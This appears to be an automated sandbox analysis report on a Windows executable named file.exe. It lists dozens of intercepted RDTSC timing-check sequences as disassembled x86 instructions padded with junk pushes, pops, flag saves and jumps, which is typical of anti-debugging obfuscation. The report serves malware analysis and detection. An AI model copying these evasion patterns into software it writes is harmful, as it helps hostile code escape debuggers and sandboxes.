Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4078DE second address: 4078E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4078E5 second address: 4078F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB678E7E6E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4078F1 second address: 4078F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4078F5 second address: 4078F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4066D4 second address: 4066DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 406847 second address: 40685B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FB678E7E6ECh 0x0000000e jc 00007FB678E7E6E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40685B second address: 406861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 406861 second address: 406865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 406865 second address: 406869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 406C5A second address: 406C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 406F65 second address: 406F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4073F0 second address: 40740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB678E7E6E6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007FB678E7E6F1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40740E second address: 407416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 407416 second address: 40741A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 407593 second address: 4075A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4075A8 second address: 4075B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40B86F second address: 40B875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BB3C second address: 40BB42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BBC3 second address: 40BBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BBD7 second address: 40BBDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BBDB second address: 40BC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb edx, 238B6C37h 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FB6784C8BD8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b adc dx, AA82h 0x00000030 movsx edx, ax 0x00000033 call 00007FB6784C8BD9h 0x00000038 jmp 00007FB6784C8BE4h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FB6784C8BE1h 0x00000044 pop edx 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c ja 00007FB6784C8BD6h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BC52 second address: 40BC5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BC5C second address: 40BC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BC60 second address: 40BC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40BC64 second address: 40BC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FB6784C8BD8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40D34E second address: 40D35B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FB678E7E6E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40D35B second address: 40D368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FB6784C8BD6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40D368 second address: 40D36E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F28D second address: 40F291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31D044 second address: 31D04A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31D04A second address: 31D06C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FB6784C8BE0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD03AD second address: 4DD03B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD03B3 second address: 4DD03B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD03FF second address: 4DD0408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 25AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0408 second address: 4DD0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0415 second address: 4DD041B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD041B second address: 4DD0420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E003DF second address: 4E00404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB678E7E6EEh 0x00000009 sub cx, 2228h 0x0000000e jmp 00007FB678E7E6EBh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00404 second address: 4E00437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop ecx 0x0000000d pushfd 0x0000000e jmp 00007FB6784C8BDDh 0x00000013 add cx, 1246h 0x00000018 jmp 00007FB6784C8BE1h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00437 second address: 4E004A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 4Eh 0x00000005 mov ax, DBEFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007FB678E7E6F2h 0x00000013 xchg eax, ecx 0x00000014 jmp 00007FB678E7E6F0h 0x00000019 push eax 0x0000001a jmp 00007FB678E7E6EBh 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FB678E7E6F6h 0x00000025 xchg eax, esi 0x00000026 jmp 00007FB678E7E6F0h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E004A2 second address: 4E004AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E004AA second address: 4E004B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E004B0 second address: 4E004B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00588 second address: 4E0058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0058E second address: 4E00592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00592 second address: 4E0060A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f pushad 0x00000010 push esi 0x00000011 pushfd 0x00000012 jmp 00007FB678E7E6EDh 0x00000017 add esi, 474F7966h 0x0000001d jmp 00007FB678E7E6F1h 0x00000022 popfd 0x00000023 pop esi 0x00000024 pushfd 0x00000025 jmp 00007FB678E7E6F1h 0x0000002a xor eax, 3B07A2C6h 0x00000030 jmp 00007FB678E7E6F1h 0x00000035 popfd 0x00000036 popad 0x00000037 mov esi, eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0060A second address: 4E0060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0060E second address: 4E00614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00614 second address: 4E0063C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB6784C8BE0h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FB6784C8C0Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 mov dx, si 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0063C second address: 4E00653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB678E7E6F1h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00673 second address: 4E00691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00691 second address: 4E006A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E006A1 second address: 4E006B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB6784C8BDAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E006B6 second address: 4E006BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0098 second address: 4DF00B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF00B4 second address: 4DF00BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF00BA second address: 4DF00BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF00BE second address: 4DF00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 45F4AF48h 0x0000000d jmp 00007FB678E7E6F6h 0x00000012 xor dword ptr [esp], 305E3100h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF00EE second address: 4DF00F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF00F2 second address: 4DF00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF00F8 second address: 4DF0136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6784C8BE2h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FB6784C8BD9h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB6784C8BE8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0136 second address: 4DF0161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ch, 89h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB678E7E6F4h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov di, 3FB2h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0161 second address: 4DF0208 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB6784C8BE3h 0x00000008 adc si, 49AEh 0x0000000d jmp 00007FB6784C8BE9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FB6784C8BE0h 0x0000001b sub cx, 6B28h 0x00000020 jmp 00007FB6784C8BDBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 jmp 00007FB6784C8BE9h 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 jmp 00007FB6784C8BE1h 0x00000037 pop eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB6784C8BE8h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0208 second address: 4DF020E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF020E second address: 4DF021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BDDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF021F second address: 4DF0278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FB678E7E6F3h 0x0000001a sub esi, 0921753Eh 0x00000020 jmp 00007FB678E7E6F9h 0x00000025 popfd 0x00000026 mov ax, 4087h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0278 second address: 4DF02CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f mov dh, cl 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 mov cx, 74BDh 0x00000018 popad 0x00000019 nop 0x0000001a pushad 0x0000001b mov dh, cl 0x0000001d call 00007FB6784C8BE7h 0x00000022 mov ebx, esi 0x00000024 pop esi 0x00000025 popad 0x00000026 sub esp, 18h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB6784C8BDEh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF02CB second address: 4DF02E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF02E1 second address: 4DF02E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF02E5 second address: 4DF0300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0300 second address: 4DF032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6784C8BDCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF032C second address: 4DF03FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB678E7E6F6h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB678E7E6EEh 0x00000017 xor eax, 154F27A8h 0x0000001d jmp 00007FB678E7E6EBh 0x00000022 popfd 0x00000023 call 00007FB678E7E6F8h 0x00000028 jmp 00007FB678E7E6F2h 0x0000002d pop ecx 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FB678E7E6EEh 0x00000037 adc esi, 15C8BC68h 0x0000003d jmp 00007FB678E7E6EBh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FB678E7E6F8h 0x00000049 jmp 00007FB678E7E6F5h 0x0000004e popfd 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF03FB second address: 4DF03FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF03FF second address: 4DF0412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0412 second address: 4DF0485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FB6784C8BDEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB6784C8BE1h 0x00000017 add cl, FFFFFFA6h 0x0000001a jmp 00007FB6784C8BE1h 0x0000001f popfd 0x00000020 call 00007FB6784C8BE0h 0x00000025 mov eax, 0E6C96E1h 0x0000002a pop ecx 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0485 second address: 4DF0489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0489 second address: 4DF049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF049F second address: 4DF04E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [75AB4538h] 0x0000000e jmp 00007FB678E7E6F6h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB678E7E6F7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF04E5 second address: 4DF050D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 mov dx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF050D second address: 4DF0513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0513 second address: 4DF0517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0517 second address: 4DF0590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB678E7E6F2h 0x00000010 adc cx, E428h 0x00000015 jmp 00007FB678E7E6EBh 0x0000001a popfd 0x0000001b call 00007FB678E7E6F8h 0x00000020 mov edi, ecx 0x00000022 pop eax 0x00000023 popad 0x00000024 mov dword ptr [esp], eax 0x00000027 jmp 00007FB678E7E6EDh 0x0000002c lea eax, dword ptr [ebp-10h] 0x0000002f jmp 00007FB678E7E6EEh 0x00000034 mov dword ptr fs:[00000000h], eax 0x0000003a pushad 0x0000003b movzx esi, dx 0x0000003e push eax 0x0000003f push edx 0x00000040 push edx 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0590 second address: 4DF05E4 instructions: 0x00000000 rdtsc 0x00000002 mov dl, 6Ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-18h], esp 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push ecx 0x00000010 mov si, dx 0x00000013 pop edi 0x00000014 popad 0x00000015 mov eax, dword ptr fs:[00000018h] 0x0000001b jmp 00007FB6784C8BDAh 0x00000020 mov ecx, dword ptr [eax+00000FDCh] 0x00000026 jmp 00007FB6784C8BE0h 0x0000002b test ecx, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007FB6784C8BDDh 0x00000035 pop esi 0x00000036 mov edi, 441E4284h 0x0000003b popad 0x0000003c rdtsc
